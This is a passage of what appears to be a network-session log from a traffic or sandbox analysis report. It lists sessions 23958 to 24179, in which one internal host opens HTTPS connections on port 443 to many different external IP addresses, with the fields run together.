                                          23958192.168.2.235516685.242.82.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23959192.168.2.233672250.15.208.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23960192.168.2.2342596199.153.126.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23961192.168.2.2332916160.128.17.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23962192.168.2.2342030157.153.155.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23963192.168.2.23606708.236.9.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23964192.168.2.2355734147.182.103.231443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23965192.168.2.23514128.32.252.198443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23966192.168.2.233523651.21.7.253443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23967192.168.2.2347496146.199.182.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23968192.168.2.2359332172.133.223.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23969192.168.2.235801080.85.12.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23970192.168.2.2347936139.7.237.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23971192.168.2.233486639.20.152.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23972192.168.2.234104420.1.5.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23973192.168.2.233743494.218.165.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23974192.168.2.234383452.127.159.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23975192.168.2.235154213.37.22.69443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23976192.168.2.2334182108.115.91.159443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23977192.168.2.2346424101.178.18.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23978192.168.2.234709687.173.31.98443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23979192.168.2.2351998137.24.199.7443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23980192.168.2.23344209.8.21.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23981192.168.2.2353340122.90.176.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23982192.168.2.2333600190.29.133.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23983192.168.2.2337394146.101.239.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23984192.168.2.2336170143.24.144.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23985192.168.2.2342618166.191.235.84443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23986192.168.2.2334650205.249.85.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23987192.168.2.2344680153.99.168.66443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23988192.168.2.234328487.93.168.24443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23989192.168.2.2344960156.41.229.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23990192.168.2.2347856177.50.212.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23991192.168.2.234577227.209.241.78443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23992192.168.2.235959240.167.135.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23993192.168.2.2338446107.57.136.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23994192.168.2.235755476.78.131.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23995192.168.2.2345952116.106.17.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23996192.168.2.2339048183.60.202.34443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23997192.168.2.2336142147.183.123.74443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23998192.168.2.233387871.227.134.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          23999192.168.2.234136471.144.127.120443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24000192.168.2.2336654163.23.201.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24001192.168.2.233726285.194.35.252443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24002192.168.2.235397869.139.55.236443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24003192.168.2.233403693.74.215.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24004192.168.2.2356680147.130.200.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24005192.168.2.233576241.37.26.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24006192.168.2.235701689.139.166.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24007192.168.2.2334766205.101.16.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24008192.168.2.235349223.141.6.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24009192.168.2.2336898192.139.109.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24010192.168.2.235935463.230.108.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24011192.168.2.234065814.86.230.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24012192.168.2.234627214.163.89.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24013192.168.2.2355340144.201.85.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24014192.168.2.2334416153.212.179.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24015192.168.2.2359782103.68.158.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24016192.168.2.2342384169.249.69.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24017192.168.2.235759441.24.173.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24018192.168.2.2352652153.14.106.29443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24019192.168.2.233674412.234.129.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24020192.168.2.2341426143.14.191.44443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24021192.168.2.233589880.187.90.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24022192.168.2.233739617.143.121.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24023192.168.2.2359594130.170.18.169443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24024192.168.2.2360628101.232.155.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24025192.168.2.23367061.181.206.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24026192.168.2.2336556133.130.47.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24027192.168.2.234231864.128.132.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24028192.168.2.2351488121.47.241.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24029192.168.2.234185048.5.117.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24030192.168.2.235942092.74.233.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24031192.168.2.233424478.106.75.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24032192.168.2.234471857.170.142.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24033192.168.2.2340930102.142.27.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24034192.168.2.2334414191.111.119.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24035192.168.2.235153034.122.147.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24036192.168.2.235093690.178.58.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24037192.168.2.23430829.125.141.32443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24038192.168.2.233987638.69.41.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24039192.168.2.2338288141.56.46.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24040192.168.2.2343712117.227.241.189443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24041192.168.2.2344126191.204.108.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24042192.168.2.2339308213.184.154.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24043192.168.2.2338430190.32.208.204443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24044192.168.2.2349880186.52.3.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24045192.168.2.2347748156.195.239.135443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24046192.168.2.234577652.44.39.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24047192.168.2.233951252.139.35.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24048192.168.2.2354700200.215.33.119443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24049192.168.2.235254034.104.56.216443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24050192.168.2.235254657.166.5.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24051192.168.2.235831648.163.193.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24052192.168.2.2353476205.236.212.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24053192.168.2.234455273.130.195.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24054192.168.2.235762431.228.109.67443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24055192.168.2.2338818126.203.245.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24056192.168.2.2340498197.176.174.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24057192.168.2.2337436222.20.171.232443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24058192.168.2.2353054136.77.100.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24059192.168.2.2345444155.247.147.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24060192.168.2.2346282134.46.182.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24061192.168.2.2348586187.114.122.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24062192.168.2.2348096126.175.194.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24063192.168.2.2354394119.62.6.177443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24064192.168.2.2349782132.37.151.37443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24065192.168.2.2359034102.216.76.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24066192.168.2.2339520104.155.168.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24067192.168.2.234688019.173.184.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24068192.168.2.2343492210.162.41.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24069192.168.2.2358852144.81.179.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24070192.168.2.2338956211.58.59.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24071192.168.2.2347082205.5.54.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24072192.168.2.2340776147.2.250.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24073192.168.2.235847838.250.28.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24074192.168.2.235410075.39.240.131443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24075192.168.2.235448490.105.159.115443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24076192.168.2.2358572102.218.69.100443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24077192.168.2.2342244205.124.190.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24078192.168.2.236089885.134.132.215443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24079192.168.2.235805093.223.187.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24080192.168.2.235225486.79.246.96443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24081192.168.2.233439892.47.198.58443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24082192.168.2.235126291.95.50.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24083192.168.2.234347870.40.26.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24084192.168.2.233575473.20.149.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24085192.168.2.2343258204.105.22.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24086192.168.2.2343888134.4.155.139443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24087192.168.2.2353114201.203.112.155443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24088192.168.2.2337136115.233.94.81443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24089192.168.2.2348122102.255.83.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24090192.168.2.233661438.95.36.40443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24091192.168.2.2344266195.204.202.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24092192.168.2.234333052.159.251.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24093192.168.2.235400238.122.90.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24094192.168.2.2353532143.122.51.197443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24095192.168.2.235140846.202.24.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24096192.168.2.233546495.178.139.19443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24097192.168.2.2359864144.58.51.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24098192.168.2.2342244110.135.5.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24099192.168.2.2355638115.168.180.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24100192.168.2.235433845.135.196.46443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24101192.168.2.2357618221.143.200.234443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24102192.168.2.234096651.245.31.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24103192.168.2.2342092181.79.131.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24104192.168.2.2347482148.197.140.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24105192.168.2.235463688.186.219.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24106192.168.2.233301263.54.104.126443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24107192.168.2.2355152118.191.211.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24108192.168.2.234627868.101.178.200443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24109192.168.2.2337376182.172.1.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24110192.168.2.233435499.31.118.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24111192.168.2.2345386168.8.37.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24112192.168.2.235555883.247.249.56443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24113192.168.2.234182471.230.101.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24114192.168.2.233959458.232.219.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24115192.168.2.235895086.172.67.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24116192.168.2.234376831.6.20.225443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24117192.168.2.235621092.148.231.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24118192.168.2.2333752206.31.194.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24119192.168.2.2339580153.21.75.142443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24120192.168.2.2351652181.12.254.1443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24121192.168.2.235292862.196.93.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24122192.168.2.2360506208.120.10.127443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24123192.168.2.2336672102.5.153.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24124192.168.2.2337068126.214.217.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24125192.168.2.2354680181.236.62.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24126192.168.2.2351266146.17.41.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24127192.168.2.233904637.67.1.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24128192.168.2.2344220118.106.0.192443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24129192.168.2.2353700115.228.211.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24130192.168.2.2352004208.90.5.184443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24131192.168.2.235452888.181.73.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24132192.168.2.235858868.127.168.26443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24133192.168.2.2359162158.67.245.138443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24134192.168.2.235764488.90.186.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24135192.168.2.234925075.122.238.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24136192.168.2.234033213.64.145.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24137192.168.2.2355508102.181.95.247443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24138192.168.2.2333624222.119.150.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24139192.168.2.2336922207.253.230.21443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24140192.168.2.2354732186.88.240.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24141192.168.2.2340314191.95.103.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24142192.168.2.2342202108.90.96.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24143192.168.2.2349078113.110.186.218443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24144192.168.2.2341234106.211.122.106443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24145192.168.2.2337206133.239.219.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24146192.168.2.235001614.54.198.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24147192.168.2.234962489.177.189.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24148192.168.2.235872893.89.111.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24149192.168.2.2355826206.176.130.235443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24150192.168.2.233514297.111.103.194443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24151192.168.2.2355336110.35.36.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24152192.168.2.2360232185.111.202.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24153192.168.2.233332278.10.189.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24154192.168.2.2336444123.34.230.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24155192.168.2.2344830173.218.211.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24156192.168.2.2334508206.158.121.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24157192.168.2.2359844144.67.33.35443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24158192.168.2.2355096160.127.158.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24159192.168.2.233893037.49.164.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24160192.168.2.2333336150.157.84.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24161192.168.2.2345382178.92.231.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24162192.168.2.234426850.195.86.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24163192.168.2.2350600128.64.86.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24164192.168.2.234236445.139.161.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24165192.168.2.234129664.34.86.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24166192.168.2.2344466116.216.119.128443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24167192.168.2.233427052.43.116.45443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24168192.168.2.235251223.249.77.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24169192.168.2.234727012.58.50.109443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24170192.168.2.2350818220.151.195.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24171192.168.2.235263898.191.114.52443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24172192.168.2.235296071.136.80.129443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24173192.168.2.2351314107.97.180.168443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24174192.168.2.235278251.236.158.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24175192.168.2.233356064.103.185.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24176192.168.2.2342372108.143.126.175443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24177192.168.2.2359212122.237.135.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24178192.168.2.2356758197.30.106.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          24179192.168.2.2344576218.136.78.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
